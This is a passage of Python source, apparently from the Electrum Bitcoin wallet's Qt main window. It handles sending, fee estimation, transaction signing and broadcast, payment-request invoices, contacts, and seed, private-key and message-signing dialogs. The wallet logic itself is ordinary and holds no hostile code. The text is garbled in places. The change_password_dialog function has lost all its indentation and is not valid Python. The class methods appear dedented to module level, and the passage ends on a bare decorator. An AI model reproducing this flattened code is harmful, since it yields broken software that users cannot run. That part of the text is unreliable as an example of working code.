    entries = list(map(self.get_contact_payto, self.contacts.keys()))
    self.completions.setStringList(entries)
def protected(func):
    '''Password request wrapper. The password is passed to the function
    as the 'password' named argument. "None" indicates either an
    unencrypted wallet, or the user cancelled the password request.
    An empty input is passed as the empty string.'''
    def request_password(self, *args, **kwargs):
        parent = self.top_level_window()
        password = None
        # keep asking until a password validates (or the user gives up)
        while self.wallet.has_keystore_encryption():
            password = self.password_dialog(parent=parent)
            if password is None:
                # User cancelled password input
                return
            try:
                self.wallet.check_password(password)
            except Exception as e:
                self.show_error(str(e), parent=parent)
            else:
                break
        kwargs['password'] = password
        return func(self, *args, **kwargs)
    return request_password
def is_send_fee_frozen(self):
    """True-ish when the user has pinned an explicit absolute fee in the fee field."""
    widget = self.fee_e
    if not (widget.isVisible() and widget.isModified()):
        return False
    return widget.text() or widget.hasFocus()
def is_send_feerate_frozen(self):
    """True-ish when the user has pinned an explicit fee rate in the feerate field."""
    widget = self.feerate_e
    if not (widget.isVisible() and widget.isModified()):
        return False
    return widget.text() or widget.hasFocus()
def get_send_fee_estimator(self):
    """Return a fixed fee (int), a feerate-based estimator callable, or None for auto."""
    if self.is_send_fee_frozen():
        return self.fee_e.get_amount()
    if self.is_send_feerate_frozen():
        feerate = self.feerate_e.get_amount()  # sat/byte feerate
        feerate = 0 if feerate is None else feerate * 1000  # sat/kilobyte feerate
        return partial(
            simple_config.SimpleConfig.estimate_fee_for_feerate, feerate)
    return None
def read_send_tab(self):
    """Collect (outputs, fee_estimator, label, coins) from the send-tab widgets."""
    label = self.message_e.text()
    if self.payment_request:
        outputs = self.payment_request.get_outputs()
    else:
        outputs = self.payto_e.get_outputs(self.max_button.isChecked())
    return outputs, self.get_send_fee_estimator(), label, self.get_coins()
def check_send_tab_outputs_and_show_errors(self, outputs) -> bool:
    """Returns whether there are errors with outputs.
    Also shows error dialog to user if so.
    """
    if self.payment_request and self.payment_request.has_expired():
        self.show_error(_('Payment request has expired'))
        return True
    if not self.payment_request:
        # free-form entry: validate the pay-to text line by line
        errors = self.payto_e.get_errors()
        if errors:
            self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
            return True
        # an alias that failed DNSSEC validation requires explicit consent
        if self.payto_e.is_alias and self.payto_e.validated is False:
            alias = self.payto_e.toPlainText()
            msg = _('WARNING: the alias "{}" could not be validated via an additional '
                    'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
            msg += _('Do you wish to continue?')
            if not self.question(msg):
                return True
    if not outputs:
        self.show_error(_('No outputs'))
        return True
    # sanity-check each output's address and amount
    for o in outputs:
        if o.address is None:
            self.show_error(_('Bitcoin Address is None'))
            return True
        if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address):
            self.show_error(_('Invalid Bitcoin Address'))
            return True
        if o.value is None:
            self.show_error(_('Invalid Amount'))
            return True
    return False  # no errors
def do_preview(self):
    """Run the send flow in preview mode: show the transaction instead of broadcasting."""
    self.do_send(preview=True)
def do_send(self, preview = False):
    """Build, confirm, sign and (unless previewing) broadcast the send-tab transaction."""
    if run_hook('abort_send', self):
        return
    outputs, fee_estimator, tx_desc, coins = self.read_send_tab()
    if self.check_send_tab_outputs_and_show_errors(outputs):
        return
    try:
        is_sweep = bool(self.tx_external_keypairs)
        tx = self.wallet.make_unsigned_transaction(
            coins, outputs, self.config, fixed_fee=fee_estimator,
            is_sweep=is_sweep)
    except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
        self.show_message(str(e))
        return
    except InternalAddressCorruption as e:
        # serious wallet corruption: surface it, then re-raise
        self.show_error(str(e))
        raise
    except BaseException as e:
        self.logger.exception('')
        self.show_message(str(e))
        return
    amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x:x[2], outputs))
    fee = tx.get_fee()
    use_rbf = self.config.get('use_rbf', True)
    if use_rbf:
        tx.set_rbf(True)
    # refuse fees below what the connected server will relay
    if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
        self.show_error('\n'.join([
            _("This transaction requires a higher fee, or it will not be propagated by your current server"),
            _("Try to raise your transaction fee, or use a server with a lower relay fee.")
        ]))
        return
    if preview:
        self.show_transaction(tx, tx_desc)
        return
    if not self.network:
        self.show_error(_("You can't broadcast a transaction without a live network connection."))
        return
    # confirmation dialog
    msg = [
        _("Amount to be sent") + ": " + self.format_amount_and_units(amount),
        _("Mining fee") + ": " + self.format_amount_and_units(fee),
    ]
    x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
    if x_fee:
        x_fee_address, x_fee_amount = x_fee
        msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
    feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE
    if fee > feerate_warning * tx.estimated_size() / 1000:
        msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
    if self.wallet.has_keystore_encryption():
        # password prompt doubles as the confirmation step
        msg.append("")
        msg.append(_("Enter your password to proceed"))
        password = self.password_dialog('\n'.join(msg))
        if not password:
            return
    else:
        msg.append(_('Proceed?'))
        password = None
        if not self.question('\n'.join(msg)):
            return
    def sign_done(success):
        if success:
            if not tx.is_complete():
                # partially signed (e.g. multisig): show it for export instead
                self.show_transaction(tx)
                self.do_clear()
            else:
                self.broadcast_transaction(tx, tx_desc)
    self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
    """Password-gated entry point for signing; @protected supplies `password`."""
    self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
    '''Sign the transaction in a separate thread. When done, calls
    the callback with a success code of True or False.
    '''
    def on_success(result):
        callback(True)
    def on_failure(exc_info):
        self.on_error(exc_info)
        callback(False)
    # plugins (e.g. TrustedCoin) may wrap the success handler
    on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
    if self.tx_external_keypairs:
        # can sign directly
        task = partial(Transaction.sign, tx, self.tx_external_keypairs)
    else:
        task = partial(self.wallet.sign_transaction, tx, password)
    msg = _('Signing transaction...')
    WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx, tx_desc):
    """Broadcast `tx` on a worker thread, then report the outcome in the GUI thread."""
    def broadcast_thread():
        # non-GUI thread
        pr = self.payment_request
        if pr and pr.has_expired():
            self.payment_request = None
            return False, _("Payment request has expired")
        status = False
        try:
            self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
        except TxBroadcastError as e:
            msg = e.get_message_for_gui()
        except BestEffortRequestFailed as e:
            msg = repr(e)
        else:
            status, msg = True, tx.txid()
        if pr and status is True:
            # BIP70 flow: mark the invoice paid and send the payment ACK
            self.invoices.set_paid(pr, tx.txid())
            self.invoices.save()
            self.payment_request = None
            refund_address = self.wallet.get_receiving_address()
            coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address)
            fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
            ack_status, ack_msg = fut.result(timeout=20)
            self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
        return status, msg
    # Capture current TL window; override might be removed on return
    parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
    def broadcast_done(result):
        # GUI thread
        if result:
            status, msg = result
            if status:
                # label the tx only once fully signed and broadcast
                if tx_desc is not None and tx.is_complete():
                    self.wallet.set_label(tx.txid(), tx_desc)
                parent.show_message(_('Payment sent.') + '\n' + msg)
                self.invoice_list.update()
                self.do_clear()
            else:
                msg = msg or ''
                parent.show_error(msg)
    WaitingDialog(self, _('Broadcasting transaction...'),
                  broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
    """Present *choices* in a modal dialog; needed by QtHandler for hardware wallets.

    Returns the index of the selected choice, or None if the dialog was dismissed.
    """
    dlg = WindowModalDialog(self.top_level_window())
    choice_layout = ChoicesLayout(msg, choices)
    outer = QVBoxLayout(dlg)
    outer.addLayout(choice_layout.layout())
    outer.addLayout(Buttons(OkButton(dlg)))
    if dlg.exec_():
        return choice_layout.selected_index()
    return None
def lock_amount(self, b):
    """Freeze or unfreeze the amount field; the Max button is only usable
    while the field is editable."""
    frozen = b
    self.amount_e.setFrozen(frozen)
    self.max_button.setEnabled(not frozen)
def prepare_for_payment_request(self):
    """Switch to the send tab and lock its fields while a payment request loads.

    Always returns True (used as a success flag by callers).
    """
    self.show_send_tab()
    self.payto_e.is_pr = True
    for field in (self.payto_e, self.message_e):
        field.setFrozen(True)
    self.lock_amount(True)
    self.payto_e.setText(_("please wait..."))
    return True
def delete_invoice(self, key):
    """Remove the invoice identified by *key* and refresh the invoice list."""
    self.invoices.remove(key)
    self.invoice_list.update()
def payment_request_ok(self):
    """Populate the send tab from a successfully verified payment request."""
    pr = self.payment_request
    key = self.invoices.add(pr)
    status = self.invoices.get_status(key)
    self.invoice_list.update()
    if status == PR_PAID:
        # nothing to do; reset the form
        self.show_message("invoice already paid")
        self.do_clear()
        self.payment_request = None
        return
    self.payto_e.is_pr = True
    # colour the payto field according to the request's expiry state
    if not pr.has_expired():
        self.payto_e.setGreen()
    else:
        self.payto_e.setExpired()
    self.payto_e.setText(pr.get_requestor())
    self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
    self.message_e.setText(pr.get_memo())
    # signal to set fee
    self.amount_e.textEdited.emit("")
def payment_request_error(self):
    """Report a failed payment-request verification and reset the send tab."""
    failed_pr = self.payment_request
    self.show_message(failed_pr.error)
    self.payment_request = None
    self.do_clear()
def on_pr(self, request):
    """Callback invoked when a payment request has been fetched; hands the
    verification result back to the GUI thread via signals."""
    self.payment_request = request
    verified = self.payment_request.verify(self.contacts)
    signal = (self.payment_request_ok_signal if verified
              else self.payment_request_error_signal)
    signal.emit()
def pay_to_URI(self, URI):
    """Fill the send tab from a BIP21 'bitcoin:' URI.

    If the URI carries a payment-request URL ('r') or a signed request,
    the BIP70 flow is started instead and on_pr() completes the form.
    """
    if not URI:
        return
    try:
        out = util.parse_URI(URI, self.on_pr)
    except BaseException as e:
        self.show_error(_('Invalid bitcoin URI:') + '\n' + str(e))
        return
    self.show_send_tab()
    r = out.get('r')
    sig = out.get('sig')
    name = out.get('name')
    # BIP70 payment request: lock the form and wait for the async fetch
    if r or (name and sig):
        self.prepare_for_payment_request()
        return
    address = out.get('address')
    amount = out.get('amount')
    label = out.get('label')
    message = out.get('message')
    # use label as description (not BIP21 compliant)
    if label and not message:
        message = label
    if address:
        self.payto_e.setText(address)
    if message:
        self.message_e.setText(message)
    if amount:
        self.amount_e.setAmount(amount)
        # signal to set fee
        self.amount_e.textEdited.emit("")
def do_clear(self):
    """Reset the send tab to its default, empty state."""
    self.max_button.setChecked(False)
    self.not_enough_funds = False
    self.payment_request = None
    self.payto_e.is_pr = False
    # blank and unfreeze every editable field of the send form
    for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
              self.fee_e, self.feerate_e]:
        e.setText('')
        e.setFrozen(False)
    self.fee_slider.activate()
    self.feerate_e.setAmount(self.config.fee_per_byte())
    self.size_e.setAmount(0)
    self.feerounding_icon.setVisible(False)
    self.set_pay_from([])
    self.tx_external_keypairs = {}
    self.update_status()
    run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
    """(Un)freeze the given addresses in the wallet and refresh affected views."""
    self.wallet.set_frozen_state_of_addresses(addrs, freeze)
    for view in (self.address_list, self.utxo_list):
        view.update()
    self.update_fee()
def set_frozen_state_of_coins(self, utxos, freeze: bool):
    """(Un)freeze the given UTXOs in the wallet and refresh affected views."""
    self.wallet.set_frozen_state_of_coins(utxos, freeze)
    self.utxo_list.update()
    self.update_fee()
def create_list_tab(self, l, toolbar=None):
    """Wrap the list widget *l* (plus an optional toolbar layout) in a
    tab-page QWidget and return it."""
    page = QWidget()
    page.searchable_list = l  # used by do_search() to filter the visible tab
    layout = QVBoxLayout()
    page.setLayout(layout)
    layout.setContentsMargins(0, 0, 0, 0)
    layout.setSpacing(0)
    if toolbar:
        layout.addLayout(toolbar)
    layout.addWidget(l)
    return page
def create_addresses_tab(self):
    """Build the Addresses tab, honouring the saved toolbar-visibility setting."""
    from .address_list import AddressList
    addr_list = AddressList(self)
    self.address_list = addr_list
    toolbar = addr_list.create_toolbar(self.config)
    addr_list.show_toolbar(self.config.get('show_toolbar_addresses', False))
    return self.create_list_tab(addr_list, toolbar)
def create_utxo_tab(self):
    """Build the Coins (UTXO) tab."""
    from .utxo_list import UTXOList
    utxo_list = UTXOList(self)
    self.utxo_list = utxo_list
    return self.create_list_tab(utxo_list)
def create_contacts_tab(self):
    """Build the Contacts tab."""
    from .contact_list import ContactList
    contact_list = ContactList(self)
    self.contact_list = contact_list
    return self.create_list_tab(contact_list)
def remove_address(self, addr):
    """Delete *addr* from the wallet after user confirmation."""
    prompt = _("Do you want to remove {} from your wallet?").format(addr)
    if not self.question(prompt):
        return
    self.wallet.delete_address(addr)
    self.need_update.set()  # schedules refresh of history, addresses, coins
    self.clear_receive_tab()
def get_coins(self):
    """Return the coins preselected via 'pay from', falling back to all
    spendable coins in the wallet."""
    return self.pay_from or self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
    """Preselect *coins* as transaction inputs and switch to the send tab."""
    self.set_pay_from(coins)
    self.show_send_tab()
    self.update_fee()
def paytomany(self):
    """Switch the send tab into multi-output mode and explain the input format."""
    self.show_send_tab()
    self.payto_e.paytomany()
    instructions = (
        _('Enter a list of outputs in the \'Pay to\' field.'),
        _('One output per line.'),
        _('Format: address, amount'),
        _('You may load a CSV file using the file icon.'),
    )
    self.show_message('\n'.join(instructions), title=_('Pay to many'))
def payto_contacts(self, labels):
    """Fill the send tab's 'pay to' field from the selected contact *labels*."""
    paytos = [self.get_contact_payto(label) for label in labels]
    self.show_send_tab()
    if len(paytos) == 1:
        # single recipient: focus the amount field next
        self.payto_e.setText(paytos[0])
        self.amount_e.setFocus()
    else:
        # multiple recipients: one "payto, amount" line each; the user
        # edits the zero amounts in place
        self.payto_e.setText("\n".join(p + ", 0" for p in paytos))
        self.payto_e.setFocus()
def set_contact(self, label, address):
    """Add or update the contact *address* with name *label*.

    Returns True on success, False if the address is invalid.
    """
    if not is_address(address):
        self.show_error(_('Invalid Address'))
        self.contact_list.update() # Displays original unchanged value
        return False
    self.contacts[address] = ('address', label)
    self.contact_list.update()
    self.history_list.update()
    self.update_completions()
    return True
def delete_contacts(self, labels):
    """Remove the given contact keys after a single confirmation prompt."""
    if not self.question(_("Remove {} from your list of contacts?")
                         .format(" + ".join(labels))):
        return
    for label in labels:
        self.contacts.pop(label)
    self.history_list.update()
    self.contact_list.update()
    self.update_completions()
def show_invoice(self, key):
    """Look up the invoice for *key* and display its details, if found."""
    pr = self.invoices.get(key)
    if pr is None:
        self.show_error('Cannot find payment request in wallet.')
        return
    # refresh the signature/verify status before showing it
    pr.verify(self.contacts)
    self.show_pr_details(pr)
def show_pr_details(self, pr):
    """Show a modal dialog with the details of payment request *pr*,
    offering export to a .bip70 file and deletion."""
    key = pr.get_id()
    d = WindowModalDialog(self, _("Invoice"))
    vbox = QVBoxLayout(d)
    grid = QGridLayout()
    grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
    grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
    grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
    outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
    grid.addWidget(QLabel(outputs_str), 1, 1)
    expires = pr.get_expiration_date()
    grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
    grid.addWidget(QLabel(pr.get_memo()), 2, 1)
    grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
    grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
    if expires:
        grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
        grid.addWidget(QLabel(format_time(expires)), 4, 1)
    vbox.addLayout(grid)
    def do_export():
        # save the raw BIP70 payment request bytes to a user-chosen file
        name = str(key) + '.bip70'
        fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
        if not fn:
            return
        with open(fn, 'wb') as f:
            f.write(pr.raw)
        # translate only the fixed text; the old code passed the filename
        # into the gettext lookup, so the message could never be translated
        self.show_message(_('Invoice saved as') + ' ' + fn)
    exportButton = EnterButton(_('Save'), do_export)
    def do_delete():
        if self.question(_('Delete invoice?')):
            self.invoices.remove(key)
            self.history_list.update()
            self.invoice_list.update()
            d.close()
    deleteButton = EnterButton(_('Delete'), do_delete)
    vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
    d.exec_()
def do_pay_invoice(self, key):
    """Load the invoice for *key* into the send tab and re-verify it."""
    pr = self.invoices.get(key)
    self.payment_request = pr
    self.prepare_for_payment_request()
    pr.error = None  # this forces verify() to re-run
    if pr.verify(self.contacts):
        self.payment_request_ok()
    else:
        self.payment_request_error()
def create_console_tab(self):
    """Instantiate the interactive Python console widget for the Console tab."""
    from .console import Console
    self.console = Console()
    return self.console
def update_console(self):
    """Refresh the console namespace with wallet/network objects and
    wrappers for every public RPC command."""
    console = self.console
    console.history = self.config.get("console-history",[])
    console.history_index = len(console.history)
    console.updateNamespace({
        'wallet': self.wallet,
        'network': self.network,
        'plugins': self.gui_object.plugins,
        'window': self,
        'config': self.config,
        'electrum': electrum,
        'daemon': self.gui_object.daemon,
        'util': util,
        'bitcoin': bitcoin,
    })
    c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
    methods = {}
    def mkfunc(f, method):
        # binds `method` now, avoiding the late-binding-closure pitfall
        return lambda *args: f(method, args, self.password_dialog)
    for m in dir(c):
        # skip private attributes and names that would shadow the namespace above
        if m[0]=='_' or m in ['network','wallet','config']: continue
        methods[m] = mkfunc(c._run, m)
    console.updateNamespace(methods)
def create_status_bar(self):
    """Build the main-window status bar: balance label, search box,
    update-check button, and password/preferences/seed/network buttons."""
    sb = QStatusBar()
    sb.setFixedHeight(35)
    self.balance_label = QLabel("Loading wallet...")
    self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
    self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
    sb.addWidget(self.balance_label)
    self.search_box = QLineEdit()
    self.search_box.textChanged.connect(self.do_search)
    self.search_box.hide()  # shown on demand by toggle_search()
    sb.addPermanentWidget(self.search_box)
    self.update_check_button = QPushButton("")
    self.update_check_button.setFlat(True)
    self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
    self.update_check_button.setIcon(read_QIcon("update.png"))
    self.update_check_button.hide()  # shown only when an update is available
    sb.addPermanentWidget(self.update_check_button)
    self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
    sb.addPermanentWidget(self.password_button)
    sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
    self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
    sb.addPermanentWidget(self.seed_button)
    self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
    sb.addPermanentWidget(self.status_button)
    run_hook('create_status_bar', sb)
    self.setStatusBar(sb)
def update_lock_icon(self):
    """Show a locked or unlocked padlock depending on whether the wallet
    currently has a password."""
    icon_name = "lock.png" if self.wallet.has_password() else "unlock.png"
    self.password_button.setIcon(read_QIcon(icon_name))
def update_buttons_on_seed(self):
    """Sync seed/password/send button visibility with wallet capabilities."""
    self.seed_button.setVisible(self.wallet.has_seed())
    self.password_button.setVisible(self.wallet.may_have_password())
    # watching-only wallets cannot sign, so hide the send button
    self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from electrum.storage import STO_EV_XPUB_PW
if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(str(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
    """Show/hide the status-bar search box; clears the filter when hiding."""
    tab = self.tabs.currentWidget()
    # NOTE(review): per-tab toolbar toggling is intentionally disabled;
    # the global search box below is used instead.
    #if hasattr(tab, 'searchable_list'):
    #    tab.searchable_list.toggle_toolbar()
    #return
    self.search_box.setHidden(not self.search_box.isHidden())
    if not self.search_box.isHidden():
        self.search_box.setFocus(1)
    else:
        self.do_search('')
def do_search(self, t):
    """Apply filter text *t* to the currently visible tab, if searchable."""
    current_tab = self.tabs.currentWidget()
    if hasattr(current_tab, 'searchable_list'):
        current_tab.searchable_list.filter(t)
def new_contact_dialog(self):
    """Modal dialog to enter a new contact (address and name)."""
    d = WindowModalDialog(self, _("New Contact"))
    vbox = QVBoxLayout(d)
    vbox.addWidget(QLabel(_('New Contact') + ':'))
    grid = QGridLayout()
    line1 = QLineEdit()  # address
    line1.setFixedWidth(280)
    line2 = QLineEdit()  # name
    line2.setFixedWidth(280)
    grid.addWidget(QLabel(_("Address")), 1, 0)
    grid.addWidget(line1, 1, 1)
    grid.addWidget(QLabel(_("Name")), 2, 0)
    grid.addWidget(line2, 2, 1)
    vbox.addLayout(grid)
    vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
    if d.exec_():
        # set_contact(label, address): line2 is the name, line1 the address
        self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
    """Show the 'Wallet Information' dialog: name, type, script type,
    seed availability, keystore type, and master public key(s)."""
    dialog = WindowModalDialog(self, _("Wallet Information"))
    dialog.setMinimumSize(500, 100)
    mpk_list = self.wallet.get_master_public_keys()
    vbox = QVBoxLayout()
    wallet_type = self.wallet.storage.get('wallet_type', '')
    if self.wallet.is_watching_only():
        wallet_type += ' [{}]'.format(_('watching-only'))
    seed_available = _('True') if self.wallet.has_seed() else _('False')
    keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
    grid = QGridLayout()
    basename = os.path.basename(self.wallet.storage.path)
    grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
    grid.addWidget(QLabel(basename), 0, 1)
    grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
    grid.addWidget(QLabel(wallet_type), 1, 1)
    grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
    grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
    grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
    grid.addWidget(QLabel(str(seed_available)), 3, 1)
    # a single keystore type is shown inline; multisig shows them per-cosigner below
    if len(keystore_types) <= 1:
        grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
        ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
        grid.addWidget(QLabel(ks_type), 4, 1)
    vbox.addLayout(grid)
    if self.wallet.is_deterministic():
        mpk_text = ShowQRTextEdit()
        mpk_text.setMaximumHeight(150)
        mpk_text.addCopyButton(self.app)
        def show_mpk(index):
            mpk_text.setText(mpk_list[index])
        # only show the combobox in case multiple accounts are available
        if len(mpk_list) > 1:
            def label(key):
                if isinstance(self.wallet, Multisig_Wallet):
                    return _("cosigner") + f' {key+1} ( keystore: {keystore_types[key]} )'
                return ''
            labels = [label(i) for i in range(len(mpk_list))]
            on_click = lambda clayout: show_mpk(clayout.selected_index())
            labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
            vbox.addLayout(labels_clayout.layout())
        else:
            vbox.addWidget(QLabel(_("Master Public Key")))
        show_mpk(0)
        vbox.addWidget(mpk_text)
    vbox.addStretch(1)
    vbox.addLayout(Buttons(CloseButton(dialog)))
    dialog.setLayout(vbox)
    dialog.exec_()
def remove_wallet(self):
    """Confirm with the user, then delete the wallet file (password-gated)."""
    prompt = '\n'.join([
        _('Delete wallet file?'),
        "%s" % self.wallet.storage.path,
        _('If your wallet contains funds, make sure you have saved its seed.'),
    ])
    if self.question(prompt):
        self._delete_wallet()
@protected
def _delete_wallet(self, password):
    """Delete the wallet file from disk; the password was already checked
    by the @protected decorator."""
    wallet_path = self.wallet.storage.path
    basename = os.path.basename(wallet_path)
    r = self.gui_object.daemon.delete_wallet(wallet_path)
    self.close()
    if r:
        self.show_error(_("Wallet removed: {}").format(basename))
    else:
        self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
    """Decrypt and display the wallet seed (and passphrase, if any)."""
    if not self.wallet.has_seed():
        self.show_message(_('This wallet has no seed'))
        return
    keystore = self.wallet.get_keystore()
    try:
        seed = keystore.get_seed(password)
        passphrase = keystore.get_passphrase(password)
    except BaseException as e:
        self.show_error(str(e))
        return
    from .seed_dialog import SeedDialog
    d = SeedDialog(self, seed, passphrase)
    d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
    """Display *data* as a QR code in a modal dialog; no-op on empty data."""
    if not data:
        return
    QRDialog(data, parent or self, title).exec_()
@protected
def show_private_key(self, address, password):
    """Decrypt and display the private key (and redeem script, if any)
    for *address* in a modal dialog."""
    if not address:
        return
    try:
        pk, redeem_script = self.wallet.export_private_key(address, password)
    except Exception as e:
        self.logger.exception('')
        self.show_message(str(e))
        return
    # script type is encoded in the WIF-serialized key
    xtype = bitcoin.deserialize_privkey(pk)[0]
    d = WindowModalDialog(self, _("Private key"))
    d.setMinimumSize(600, 150)
    vbox = QVBoxLayout()
    vbox.addWidget(QLabel(_("Address") + ': ' + address))
    vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
    vbox.addWidget(QLabel(_("Private key") + ':'))
    keys_e = ShowQRTextEdit(text=pk)
    keys_e.addCopyButton(self.app)
    vbox.addWidget(keys_e)
    if redeem_script:
        vbox.addWidget(QLabel(_("Redeem Script") + ':'))
        rds_e = ShowQRTextEdit(text=redeem_script)
        rds_e.addCopyButton(self.app)
        vbox.addWidget(rds_e)
    vbox.addLayout(Buttons(CloseButton(d)))
    d.setLayout(vbox)
    d.exec_()
# Explanation shown by do_sign() when the chosen address type cannot
# produce a message signature (no unique corresponding public key).
msg_sign = _("Signing with an address actually means signing with the corresponding "
             "private key, and verifying with the corresponding public key. The "
             "address you have entered does not have a unique public key, so these "
             "operations cannot be performed.") + '\n\n' + \
           _('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
    """Sign *message* with the key for *address* on the wallet thread and
    put the base64 signature into the *signature* widget.

    The parameters are Qt widgets, not plain strings.
    """
    address = address.text().strip()
    message = message.toPlainText().strip()
    if not bitcoin.is_address(address):
        self.show_message(_('Invalid Bitcoin address.'))
        return
    if self.wallet.is_watching_only():
        self.show_message(_('This is a watching-only wallet.'))
        return
    if not self.wallet.is_mine(address):
        self.show_message(_('Address not in wallet.'))
        return
    txin_type = self.wallet.get_txin_type(address)
    # message signing is only defined for single-key address types
    if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
        self.show_message(_('Cannot sign messages with this type of address:') + \
                          ' ' + txin_type + '\n\n' + self.msg_sign)
        return
    task = partial(self.wallet.sign_message, address, message, password)
    def show_signed_message(sig):
        try:
            signature.setText(base64.b64encode(sig).decode('ascii'))
        except RuntimeError:
            # (signature) wrapped C/C++ object has been deleted
            pass
    self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
    """Verify a base64 message signature against *address*.

    The parameters are Qt widgets, not plain strings.
    """
    address = address.text().strip()
    message = message.toPlainText().strip().encode('utf-8')
    if not bitcoin.is_address(address):
        self.show_message(_('Invalid Bitcoin address.'))
        return
    try:
        # This can throw on invalid base64
        sig = base64.b64decode(str(signature.toPlainText()))
        verified = ecc.verify_message_with_address(address, sig, message)
    except Exception as e:
        # any decoding/verification failure simply means "wrong signature"
        verified = False
    if verified:
        self.show_message(_("Signature verified"))
    else:
        self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
    """Modal dialog for signing a message with a wallet address and for
    verifying a message signature."""
    d = WindowModalDialog(self, _('Sign/verify Message'))
    d.setMinimumSize(610, 290)
    layout = QGridLayout(d)
    message_e = QTextEdit()
    message_e.setAcceptRichText(False)
    layout.addWidget(QLabel(_('Message')), 1, 0)
    layout.addWidget(message_e, 1, 1)
    layout.setRowStretch(2,3)
    address_e = QLineEdit()
    address_e.setText(address)
    layout.addWidget(QLabel(_('Address')), 2, 0)
    layout.addWidget(address_e, 2, 1)
    signature_e = QTextEdit()
    signature_e.setAcceptRichText(False)
    layout.addWidget(QLabel(_('Signature')), 3, 0)
    layout.addWidget(signature_e, 3, 1)
    layout.setRowStretch(3,1)
    hbox = QHBoxLayout()
    b = QPushButton(_("Sign"))
    b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
    hbox.addWidget(b)
    b = QPushButton(_("Verify"))
    b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
    hbox.addWidget(b)
    b = QPushButton(_("Close"))
    b.clicked.connect(d.accept)
    hbox.addWidget(b)
    layout.addLayout(hbox, 4, 1)
    d.exec_()
@protected
